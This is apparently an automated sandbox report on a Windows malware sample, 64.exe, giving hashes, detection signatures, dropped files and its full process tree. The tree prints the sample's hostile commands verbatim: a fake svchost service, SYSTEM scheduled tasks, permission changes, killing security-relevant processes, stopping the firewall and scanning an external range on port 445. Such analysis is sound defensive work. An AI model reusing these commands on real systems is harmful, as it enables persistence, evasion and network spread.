Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-05-2021 11:09
Static task
static1
Behavioral task
behavioral1
Sample
64.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
64.exe
Resource
win10v20210410
General
-
Target
64.exe
-
Size
1.6MB
-
MD5
2510bc30669edc05f9aeb06f5c92bed2
-
SHA1
3ac2a1e223d74323c18c9d4788ec3195c382dc64
-
SHA256
428280c60495d98bb323401c877783e641d21f649684fbacbb29bc8067bf6635
-
SHA512
9140358e8b8587b415ef65f0f13005920cf98ea3e98bf984aded7e1a10408b9a7f8bb4bde22de5e698f6ec3bf9d32abca849194e0b1c9daa8cb08961d03bddfb
Malware Config
Signatures
-
Executes dropped EXE 11 IoCs
Processes:
dxdiag.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exewget.exetaskhost.exepid process 2040 dxdiag.exe 1328 svchost.exe 1308 svchost.exe 1860 svchost.exe 1448 svchost.exe 1400 svchost.exe 1492 svchost.exe 1020 svchost.exe 1972 svchost.exe 824 wget.exe 1876 taskhost.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule \Windows\Fonts\Ms\wget.exe upx C:\Windows\Fonts\Ms\wget.exe upx C:\Windows\Fonts\Ms\wget.exe upx \Windows\Fonts\Ms\wget.exe upx -
Loads dropped DLL 9 IoCs
Processes:
64.execmd.execmd.exepid process 1820 64.exe 1820 64.exe 1168 cmd.exe 1168 cmd.exe 1168 cmd.exe 464 cmd.exe 464 cmd.exe 464 cmd.exe 464 cmd.exe -
Drops file in Windows directory 41 IoCs
Processes:
64.exewget.exedxdiag.exetaskhost.exedescription ioc process File created C:\Windows\Fonts\Ms\p.txt 64.exe File created C:\Windows\Fonts\Ms\Eter.exe 64.exe File created C:\Windows\Fonts\Ms\Eter.dll 64.exe File created C:\Windows\Fonts\Ms\any.bat 64.exe File created C:\Windows\Fonts\Ms\puls.xml 64.exe File created C:\Windows\Fonts\Ms\coli-0.dll 64.exe File created C:\Windows\Fonts\Ms\ld.bat 64.exe File created C:\Windows\Fonts\Ms\svchost.exe 64.exe File created C:\Windows\Fonts\Ms\tich-1.dll 64.exe File created C:\Windows\Fonts\Ms\tucl-1.dll 64.exe File created C:\Windows\Fonts\Ms\ucl.dll 64.exe File created C:\Windows\Fonts\Ms\xdvl-0.dll 64.exe File created C:\Windows\Fonts\Ms\neibu.bat 64.exe File created C:\Windows\Fonts\Ms\mance.exe 64.exe File created C:\Windows\Fonts\Ms\wget.exe 64.exe File created C:\Windows\Fonts\Ms\tibe-2.dll 64.exe File created C:\Windows\Fonts\Ms\temp.txt wget.exe File created C:\Windows\Fonts\Ms\zlib1.dll 64.exe File created C:\Windows\Help\dxdiag.exe 64.exe File opened for modification C:\Windows\svchost.exe dxdiag.exe File created C:\Windows\Fonts\Ms\Eter.xml 64.exe File created C:\Windows\Fonts\Ms\libeay32.dll 64.exe File created C:\Windows\Fonts\Ms\NansHou.dll 64.exe File created C:\Windows\Fonts\Ms\tufo-2.dll 64.exe File created C:\Windows\Fonts\Ms\libxml2.dll 64.exe File created C:\Windows\Fonts\Ms\ssleay32.dll 64.exe File created C:\Windows\Fonts\Ms\trch-1.dll 64.exe File created C:\Windows\Fonts\Ms\trfo-2.dll 64.exe File created C:\Windows\Fonts\Ms\cnli-1.dll 64.exe File created C:\Windows\Fonts\Ms\crli-0.dll 64.exe File created C:\Windows\Fonts\Ms\Doubl.dll 64.exe File created C:\Windows\Fonts\Ms\exma-1.dll 64.exe File opened for modification C:\Windows\Fonts\Ms\Result.txt taskhost.exe File created C:\Windows\Fonts\Ms\cm.bat 64.exe File created C:\Windows\Fonts\Ms\puls.exe 64.exe File created C:\Windows\Fonts\Ms\dmgd-4.dll 64.exe File created C:\Windows\svchost.exe dxdiag.exe File created C:\Windows\Fonts\Ms\lb.bat 64.exe File created C:\Windows\Fonts\Ms\mance.xml 64.exe File created C:\Windows\Fonts\Ms\taskhost.exe 64.exe File created C:\Windows\Fonts\Ms\posh-0.dll 64.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1200 schtasks.exe 1836 schtasks.exe -
Kills process with taskkill 19 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1872 taskkill.exe 1380 taskkill.exe 840 taskkill.exe 300 taskkill.exe 1328 taskkill.exe 1492 taskkill.exe 1636 taskkill.exe 1976 taskkill.exe 1768 taskkill.exe 1976 taskkill.exe 1616 taskkill.exe 1704 taskkill.exe 736 taskkill.exe 568 taskkill.exe 1376 taskkill.exe 2024 taskkill.exe 1676 taskkill.exe 1676 taskkill.exe 1964 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 1000 PING.EXE 640 PING.EXE 1624 PING.EXE 1028 PING.EXE -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1976 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 300 taskkill.exe Token: SeDebugPrivilege 1380 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 736 taskkill.exe Token: SeDebugPrivilege 1328 taskkill.exe Token: SeDebugPrivilege 568 taskkill.exe Token: SeDebugPrivilege 840 taskkill.exe Token: SeDebugPrivilege 1492 taskkill.exe Token: SeDebugPrivilege 1376 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1636 taskkill.exe Token: SeDebugPrivilege 1976 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 2024 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
dxdiag.exesvchost.exepid process 2040 dxdiag.exe 1860 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64.execmd.exesvchost.execmd.exenet.exenet.exedescription pid process target process PID 1820 wrote to memory of 2040 1820 64.exe dxdiag.exe PID 1820 wrote to memory of 2040 1820 64.exe dxdiag.exe PID 1820 wrote to memory of 2040 1820 64.exe dxdiag.exe PID 1820 wrote to memory of 2040 1820 64.exe dxdiag.exe PID 1820 wrote to memory of 1168 1820 64.exe cmd.exe PID 1820 wrote to memory of 1168 1820 64.exe cmd.exe PID 1820 wrote to memory of 1168 1820 64.exe cmd.exe PID 1820 wrote to memory of 1168 1820 64.exe cmd.exe PID 1168 wrote to memory of 1328 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1328 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1328 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1328 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1308 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1308 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1308 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1308 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1844 1168 cmd.exe sc.exe PID 1168 wrote to memory of 1844 1168 cmd.exe sc.exe PID 1168 wrote to memory of 1844 1168 cmd.exe sc.exe PID 1168 wrote to memory of 1844 1168 cmd.exe sc.exe PID 1168 wrote to memory of 1448 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1448 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1448 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 1448 1168 cmd.exe svchost.exe PID 1400 wrote to memory of 464 1400 svchost.exe cmd.exe PID 1400 wrote to memory of 464 1400 svchost.exe cmd.exe PID 1400 wrote to memory of 464 1400 svchost.exe cmd.exe PID 1400 wrote to memory of 464 1400 svchost.exe cmd.exe PID 464 wrote to memory of 1020 464 cmd.exe mode.com PID 464 wrote to memory of 1020 464 cmd.exe mode.com PID 464 wrote to memory of 1020 464 cmd.exe mode.com PID 464 wrote to memory of 1020 464 cmd.exe mode.com PID 464 wrote to memory of 1028 464 cmd.exe sc.exe PID 464 wrote to memory of 1028 464 cmd.exe sc.exe PID 464 wrote to memory of 1028 464 cmd.exe sc.exe PID 464 wrote to memory of 1028 464 cmd.exe sc.exe PID 464 wrote to memory of 1156 464 cmd.exe sc.exe PID 464 wrote to memory of 1156 464 cmd.exe sc.exe PID 464 wrote to memory of 1156 464 cmd.exe sc.exe PID 464 wrote to memory of 1156 464 cmd.exe sc.exe PID 464 wrote to memory of 1468 464 cmd.exe sc.exe PID 464 wrote to memory of 1468 464 cmd.exe sc.exe PID 464 wrote to memory of 1468 464 cmd.exe sc.exe PID 464 wrote to memory of 1468 464 cmd.exe sc.exe PID 464 wrote to memory of 856 464 cmd.exe sc.exe PID 464 wrote to memory of 856 464 cmd.exe sc.exe PID 464 wrote to memory of 856 464 cmd.exe sc.exe PID 464 wrote to memory of 856 464 cmd.exe sc.exe PID 464 wrote to memory of 816 464 cmd.exe net.exe PID 464 wrote to memory of 816 464 cmd.exe net.exe PID 464 wrote to memory of 816 464 cmd.exe net.exe PID 464 wrote to memory of 816 464 cmd.exe net.exe PID 816 wrote to memory of 384 816 net.exe net1.exe PID 816 wrote to memory of 384 816 net.exe net1.exe PID 816 wrote to memory of 384 816 net.exe net1.exe PID 816 wrote to memory of 384 816 net.exe net1.exe PID 464 wrote to memory of 300 464 cmd.exe net.exe PID 464 wrote to memory of 300 464 cmd.exe net.exe PID 464 wrote to memory of 300 464 cmd.exe net.exe PID 464 wrote to memory of 300 464 cmd.exe net.exe PID 300 wrote to memory of 1276 300 net.exe net1.exe PID 300 wrote to memory of 1276 300 net.exe net1.exe PID 300 wrote to memory of 1276 300 net.exe net1.exe PID 300 wrote to memory of 1276 300 net.exe net1.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 848 attrib.exe 1448 attrib.exe 1468 attrib.exe 1636 attrib.exe 1448 attrib.exe 1204 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\64.exe"C:\Users\Admin\AppData\Local\Temp\64.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Help\dxdiag.exe"C:\Windows\Help\dxdiag.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\Fonts\Ms\any.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\Fonts\Ms\svchost.exesvchost install MSSQLD "C:\Windows\Fonts\Ms\cm.bat"3⤵
- Executes dropped EXE
-
C:\Windows\Fonts\Ms\svchost.exesvchost install "MSSQLD" C:\Windows\Fonts\Ms\cm.bat3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exesc config "MSSQLD" start= AUTO3⤵
-
C:\Windows\Fonts\Ms\svchost.exesvchost start "MSSQLD"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet start "MSSQLD"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "MSSQLD"4⤵
-
C:\Windows\SysWOW64\net.exenet stop "MicrosoftMsql"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MicrosoftMsql"4⤵
-
C:\Windows\Fonts\Ms\svchost.exesvchost stop "MicrosoftMsql"3⤵
- Executes dropped EXE
-
C:\Windows\Fonts\Ms\svchost.exesvchost remove "MicrosoftMsql" confirm3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\sc.exesc delete "MicrosoftMsql"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /TN "At8" /TR "C:\Windows\Fonts\Ms\neibu.bat" /SC daily /ST 10:40:00 /RU SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\windows\tasks\At*.job3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\System32\Tasks\At*3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At6.job /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At6.job /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At6 /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At* /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At6.job /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At6.job /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At6 /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At6 /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\net.exenet start schedule3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start schedule4⤵
-
C:\Windows\SysWOW64\sc.exesc start schedule3⤵
-
C:\Windows\Fonts\Ms\svchost.exesvchost start schedule3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /TN "At8" /TR "C:\Windows\Fonts\Ms\neibu.bat" /SC daily /ST 10:40:00 /RU SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\attrib.exeattrib -r C:\windows\tasks\At*.job3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib -r C:\Windows\System32\Tasks\At*3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At8.job /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At8.job /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At8 /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At8 /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Msql\*.* /c /e /t /g everyone:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Msql\*.* /c /e /t /g system:F3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\Fonts\Msql\*.*3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\Fonts\Msql3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ss.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im c32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im c64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im service.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ll.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\svchost.exeC:\Windows\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Fonts\Ms\svchost.exeC:\Windows\Fonts\Ms\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\Fonts\Ms\cm.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mode.commode con cols=50 lines=403⤵
-
C:\Windows\SysWOW64\sc.exesc config Browser start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanworkstation start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
-
C:\Windows\SysWOW64\net.exenet start Browser3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Browser4⤵
-
C:\Windows\SysWOW64\net.exenet start lanmanworkstation3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start lanmanworkstation4⤵
-
C:\Windows\SysWOW64\net.exenet start lanmanserver3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start lanmanserver4⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Eter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Eter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mance.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im puls.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wget.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\Fonts\Ms\wget.exewget -t 8 -O temp.txt "http://v4.ipv6-test.com/api/myip.php"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 33⤵
- Runs ping.exe
-
C:\Windows\Fonts\Ms\taskhost.exetaskhost.exe tcp 154.61.0.254 154.61.255.254 445 450 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Fonts\Ms\any.batMD5
f3ce82845d4d64d0083bef0bbcabe64b
SHA115161c5ddfeecf09c85150af69e9bcb346896194
SHA256a34508f4fd08a101c6e6fa66eeb73f911c2de4232c9efe6c0034c91ac3e891c9
SHA5127109a3e522c2c62aaf81ec78857c6a90628b296643bf78f54522af02dfaa7fe64e0b746d2d08b35b8af5d0277edac628c4a6f462e6f102750f10ae2a47bad7c2
-
C:\Windows\Fonts\Ms\cm.batMD5
68968837ea789e5e16eee6f9c83da61c
SHA1f95134afa83a75de37abd2f9a40df53e5a6fbbd6
SHA256649abc56dd3492d25088700b819054f07c54872b172d69319517f509e5bf5913
SHA51215a63b1c97099597e11ab0ef384375aabd4ed705f8bb9325a3510d876c76ed3669a64b27e5609a8353f2c12d91090730d1e4cd5c34e8d9ba33e900816685ccfa
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
C:\Windows\Fonts\Ms\taskhost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\Fonts\Ms\taskhost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\Fonts\Ms\temp.txtMD5
71d587e911373f62d72a158eceb6e0e7
SHA168d81a1a4fb19c609288a94f10d1bbb92d972a68
SHA256acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
SHA512a0010c487c8b1eeae82ae82896bf5f48b7ec5573197bbe149b6803093a32b3b470ef0b122278e404cd5df296376bb0629438609997d52c14757ff1c3e6756060
-
C:\Windows\Fonts\Ms\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Windows\Fonts\Ms\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Windows\Help\dxdiag.exeMD5
3f16cd0ddc89cee34e2a17516d3cdaf7
SHA195980b35711abe98275faa6ecd6ca40f4ca41ead
SHA256309b9f57044afd1c8b0e0381da3e54cdd3f45aafd924bfbff2fd1d5aa0166e48
SHA51245b4e193b77f818c2f418e2b4dafb86c107dc6f9ec9f07eca9b44c7370bd234dbc3547cc8ea1f022d0b46f3dcf6b155836c8a60fbf342fbfbd423cda9a404f6b
-
C:\Windows\Help\dxdiag.exeMD5
